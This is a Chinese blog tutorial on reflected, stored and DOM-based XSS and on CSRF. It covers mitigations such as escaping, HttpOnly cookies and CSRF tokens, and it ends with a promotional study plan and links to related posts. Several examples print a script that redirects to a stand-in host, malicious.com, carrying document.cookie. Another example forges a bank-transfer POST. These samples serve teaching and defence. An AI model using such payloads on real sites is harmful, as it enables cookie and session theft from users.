反射型 XSS 疑问及延伸(CSRF)

于 2024-05-24 17:00:00 发布
阅读量1.4k 收藏 36
点赞数 38
文章标签: xss csrf 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Karka_/article/details/139068683
版权

有关反射型 XSS 的疑问

学习 XSS (Cross-Site Scripting,跨站脚本攻击) 的时候可以了解到 XSS 分为三种:持久型 (type-2),反射型 (type-1) 和基于 DOM 型 (type-0) 。
在看反射型的时候,总结一下大多数帖子给出的解释:恶意脚本本身是作为请求参数发送到站点页面存在漏洞的地方(通常是搜索框),然后脚本反射(出现)在新渲染(或者部分刷新)的页面并执行。

接下来看例子:
用户在一个不防范 XSS 的网站中搜索内容,关键字为 XXX,如果网站内包含 XXX的内容,那么该内容就会被展示出来,如果网站中不包含相关,那么可能会提示 XXX 相关内容不存在。也就是,用户的搜索内容最终都会以某种方式反射到搜索结果中。如果搜索内容为:<script>alert(1)</script>,那么页面就会执行这段 JavaScript 代码,也即该网站存在 XSS 漏洞。

那么问题来了: 作为不懂 JavaScript 的用户,是不可能自己在搜索框中输入恶意脚本攻击自己的。大部分网上的帖子给出的例子到以上内容为止,解释了什么是反射型 XSS,但是却没有说明如何进行攻击。我猜想是通过例如 www.example.com?search=<script>window.location='http://malicious.com/?data=' + document.cookie</script> 这样的恶意链接做到的,经历一番搜寻求证,还是在一些博客中有提及的确是这样做的(具体查看文末参考)。

XSS 小结

上文提到,XSS 可以分为三种,持久型(Persistent),反射型(Reflected),和基于 DOM 型(DOM-Based)。仔细来讲一下这三者吧。

持久型

定义

恶意脚本被攻击者上传到合法的服务器中,并在常规的页面浏览过程中返回给普通用户并被执行。

例子

攻击者在一个博客网站中的一篇博客下评论 <script>window.location='http://malicious.com/?data=' + document.cookie</script>,恶意代码就会在所有访问这篇博客评论的用户的浏览器中执行。

反射型

定义

上文提过了,这里重复一遍:恶意脚本本身是作为请求参数发送到站点页面存在漏洞的地方(通常是搜索框),然后脚本反射(出现)在新渲染(或者部分刷新)的页面并执行。

例子

例子就不重复,开头给出了具体的例子。不过查阅的文章中有张图很形象,这里引用一下

反射型 XSS 图片说明

基于 DOM 型

定义

基于 DOM 型 XSS 其实是一种特殊的反射型 XSS,反射型 XSS 的执行过程经过了服务器端(上面的例子中向服务器发了请求),而基于 DOM 的 XSS 没有经过服务器端(恶意代码没有流经服务端),直接通过 JavaScript(并非攻击者写的恶意脚本,而是来自服务器的 DOM 操作脚本)将数据输出到 HTML 页面中。

例子

假设如下表单是让用户选择他的首选语言,默认选项作为参数提供在了 “default” 参数中。

Select your language:

<select><script> document.write("<OPTION value=1>" + document.location.href.substring( document.location.href.indexOf("default=") + 8)+"</OPTION>");
document.write("<OPTION value=2>English</OPTION>"); </script></select>

使用一下 URL 调用该页面

http://www.some.site/page.html?default=French

可以通过向受害者发送以下 URL 来完成基于 DOM 的 XSS 攻击

http://www.some.site/page.html?default=<script>window.location='http://malicious.com/?data=' + document.cookie</script>

反射型和持久型区别

最大的区别就是 XSS 恶意代码是否存储在合法服务器中,网友也有提到反射型需要欺骗用户点击链接,而持久型用户访问相关页面就直接触发。

缓解办法

根据攻击原理,可得出如下缓解办法(主要核心是第一条 —— 警惕用户输入):

  • 验证用户输入或者做内容转义

  • 对于反射型,可以提醒用户小心恶意链接(这个几乎没用。。。)或者浏览器对 URL 做识别(Chrome,Firefox都支持)

  • 对于盗用 Cookie ,设置 HttpOnly 属性来保证 JavaScript 代码无法访问 cookie

XSS 延伸之 CSRF

因为都是 Cross-Site,XSS 和 CSRF 有时候一起出现尽管他们并不相同,CSRF 是 Cross-Site Request Forgery (跨站请求伪造),CSRF 攻击通过伪装成受信任用户的请求来利用受信任的网站,不管使用什么方法只要是伪造用户发起的请求都可以称为 CSRF 攻击。

例子

用户访问银行的网站,在 Session 还未过期的情况下(伪造用户身份的关键) ,访问了危险网站,危险网站执行如下代码

$.post('/www.bank.com/transfer?amt=500&transferTo=B, function(data) { } );

这时候用户在不知情的情况下转账给了用户B 500元。

缓解办法

不难看出,以上恶意网站发出的请求是跨域请求,在同源策略(Same Origin Policy)未被禁用时会被拦截,即使攻击者通过 iframe/form 来成功发送该请求(才知道表单允许跨域,因为无法获取表单提交后的结果),服务器端也可以通过检查 Referer 来判断请求来源是否合法。
但是,如果银行使用的是 GET 请求来完成转账操作,攻击者可以结合 XSS 来做到 CSRF 攻击,只需要借助以上 XSS 办法让用户点击请求的 URL 即可,这种情况下的 CSRF 又叫 XSRF。这种情况下通过改良网站的 API 设计提高 CSRF 攻击的门槛。
对系统的关键操作添加验证码也是有效抵抗 CSRF 攻击的办法,因为 “CSRF 攻击往往是在用户不知情的情况下构造了网络请求。而验证码会强制用户必须与应用进行交互,才能完成最终请求” 。
不过针对 CSRF 最常用的方法还是使用 CSRF-Token ,通过在每次请求的请求头中添加 Token,服务器检查 Token 可以有效防止 CSRF 攻击。

CSRF 与 XSS 的区别

一句话总结:XSS 利用的是网站对用户(输入)的信任,CSRF 利用的是网站对用户网页浏览器的信任。

参考

接下来我将给各位同学划分一张学习计划表!

学习计划

那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:

阶段一:初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?

阶段二:中级or高级网络安全工程师(看自己能力)

综合薪资区间15k~30k

7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。

零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;

Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三:顶级网络安全工程师

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资料分享

当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。

zaB-gVGVpkm161PMw)

学习资料分享

当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。

程序员桔子
关注
  • 38
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
js跨域名传参_反射的跨站脚本攻击(XSS
weixin_39542742的博客
12-12 345
反射XSS为前段提交的数据不存储在后端数据库或者存储中,直接经过后端代码处理在前段显示出来而和DOM的区别是输出的信息是由后端来处理的,而不是前端js直接修改html,相同则为数据都到了后端所以反射xss又称之为非存储xssDVWA测试防护等级:低header("X-XSS-Protection:0");//Isther...
关于那些Web漏洞--XSS(反射)
shawdow_bug的博客
06-16 97
反射XSS原理
反射XSS攻击具体是如何实现的?如何预防呢?
2301_76418831的博客
05-03 316
对于重要的用户数据,如身份验证凭据和支付信息,应采取更加安全的措施,例如使用HTTPS,加密数据等。使用安全框架和安全编码实践,例如OWASP Top 10,以确保应用程序能够抵御XSS等攻击。我们可以对所有输入数据进行验证,过滤或转义,特别是在将其输出到页面中时。对于敏感操作,例如更改密码或删除帐户,应要求用户进行额外的身份验证。应用程序接收到请求后,会将其中的数据作为输入并在页面中反射输出。受害者浏览器接收到反射输出的页面后,会将其中的恶意脚本执行。
防sql注入和xss攻击, springmv拦截器
07-24
防sql注入和xss攻击, springmv拦截器,可自由调整需要拦截的字符
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
xss反射存储的+csrf+html注入老网站的练习源码
前端安全系列:如何防止XSS攻击?
01-27
XSSCSRF等安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-SiteCookies等新技术来增强安全性,但是仍存在很多潜
ZVuldrill 黑客靶场 附带安装教程
01-26
平台中有10个挑战,包含的漏洞有: ·SQL注入 ·储存反射XSS ·CSRF ·文件包含 ·后台弱口令 ·文件上传 ·目录遍历 ·权限跨越
java版商城源码下载-tenbugsEveryday:只是为我
06-05
上传图片带来的存储xss CSRF 其他前端安全 SSRF 下载图片处,利用302跳转绕过限制,使用dict协议+phpinfo()页面中泄漏的内网地址和端口就可以通过页面加载时间探测端口,6379端口getshell 分享功能处,可以直接用http...
Web安全培训ppt(适合初学者)
10-31
XSS(跨站脚本攻击):反射XSS、存储XSS、DOM XSS CSRF(跨站请求伪造) SSRF(服务器端请求伪造) 文件上传下载:富文本编辑器 弱口令: X-Scan、Brutus、Hydra、溯雪等工具 其它漏洞: 4、逻辑漏洞(3天) ...
详解XSS漏洞及反射XSS漏洞
最新发布
Rockboy777的博客
09-16 239
跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码,将其注入到Web页面中,并在访问该页面的用户浏览器中执行该脚本代码,从而窃取用户敏感信息、篡改页面内容、操纵页面行为等。XSS漏洞一般分为反射XSS、存储XSS和DOM-Based XSS三种类反射XSS漏洞是Web应用程序中常见的安全漏洞,攻击者可利用该漏洞注入恶意代码,窃取用户敏感信息、篡改页面内容、操纵页面行为等。
XSS的原理分析、反射XSS
weixin_41487522的博客
05-06 2301
XSS的原理分析 XSS的原理和特性 XSS可以理解为html代码的注入。 这里简单回顾一下注入: 注入的两个关键条件: 1.用户输入能够控制输入 2.原本程序要执行的代码,拼接了用户输入的数据 这里XSS拼接的就是网页的html代码,一般而言我们是可以拼接出合适的html代码去执行恶意的JS语句。 因为达到各种各样的效果需要比较复杂的代码,所以XSS平台应运而生: xsspt.com(开放注册)...
DVWA(三)反射XSSXSS(Reflected))
qq_42180996的博客
07-25 2069
反射XSS 一、实验环境 二、实验原理 1.概念 2.xss漏洞类 3.原理 4.原理图解 三、实验步骤 (一)Low级别 1.源码 2.正确输入 3.直接嵌入 4.元素事件之加载即弹窗 5.元素事件之登入超链接 6.元素事件之查找超链接图片 7.元素事件之点击即弹窗 8.重定向至百度 9.重定向至超链接 10.重定向至超链接图片 11.获取cook...
tomcat优化之服务器性能
kongquexue的专栏
05-24 185
 1、以Tomcat7为例,修改其conf/server.xml文件,优化连接配置,修改其连接数   &lt;Connector connectionTimeout="20000" port="8080" protocol="HTTP/1.1" redirectPort="8443" maxThreads="600" ..
tomcat 防xss 的一种实现
12-21 3936
我的解决方法, 通过Servlet 过滤器 过滤请求 关键在于是如何在Filter取到post里的内容通过继承javax.servlet.http.HttpServletRequestWrapper;类替换post里的非法字符1:FormDataXssRequest类import javax.servlet.http.HttpServletRequest; import javax.servlet.
奇安信Python反射XSS解决办法-2021.12.17
xiuxiuxiu666的博客
12-17 2080
项目上线需要通过奇安信代码扫描,在网络上没有找到Python的具体解决办法,参考别人的博客试了一下,通过了代码测试 缺陷的详细信息为: 应用程序通过web请求获取不可信的数据,在未检验数据是否存在恶意代码的情况下,便将其传送给了web用户,应用程序将容易受到反射xss攻击。 示例: name = request.GET['name'] return 'username:'+name 如果name里包含恶意代码,那么web浏览器就会执行该代码,应用程序将受到反射xss攻击。 修复建议: 1.输入验证(比
tomcat启动时报可能的根本原因包括-Xss的设置过低和非法的循环继承依赖项的错误
weixin_43389143的博客
09-24 6212
tomcat启动时报子容器启动失败非法循环依赖的错误前言错误原因解决方案 前言 在项目部署时遇到无法启动组件[StandardEngine[Catalina],可能的根本原因包括-Xss的设置过低和非法的循环继承依赖项 错误原因 依赖冲突,bcprov-jdk15on-x.xx.jar and bcprov-jdk16-x.xx.jar 的冲突导致 解决方案 找到tomcat配置文件/usr/local/tomcat/conf/catalina.properties 编辑文件,添加 bcprov-jd
tomcat启动报错:too low setting for -Xss,造成原因是.....org.bouncycastle.asn1.ASN1EncodableVector...
weixin_45387269的博客
02-04 615
org.bouncycastle.asn1.ASN1EncodableVector 出现问题: maven使用tomcat7:tun 插件启动报错 解决办法: idea中配置一行命令即可 -DjarsToSkip=bcprov*.jar
tomcat基础配置
Alan_beijing
07-01 314
1.解决8h相缠问题 对tomcat的bin目录下的文件catalina.sh添加如下内容 JAVA_OPTS="$JAVA_OPTS -Dfile.encoding=UTF8 -Duser.timezone=GMT+08" 2.添加jvm参数 对tomcat的bin目录下的文件catalina.sh添加,如下为我添加内容: JAVA_OPTS="-server -Xmx9g -Xms9g -Xmn3g -Xss500k -XX:+DisableExplicitGC -XX:MetaspaceS.
xsscsrf的区别
07-20
反射XSS攻击是将恶意代码作为URL参数或表单提交到服务器端,服务器端将恶意代码返回给浏览器并执行;DOMXSS攻击则是通过修改网页的DOM结构来实现攻击。 CSRF攻击则是利用用户已经登录认证的状态下,诱使用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值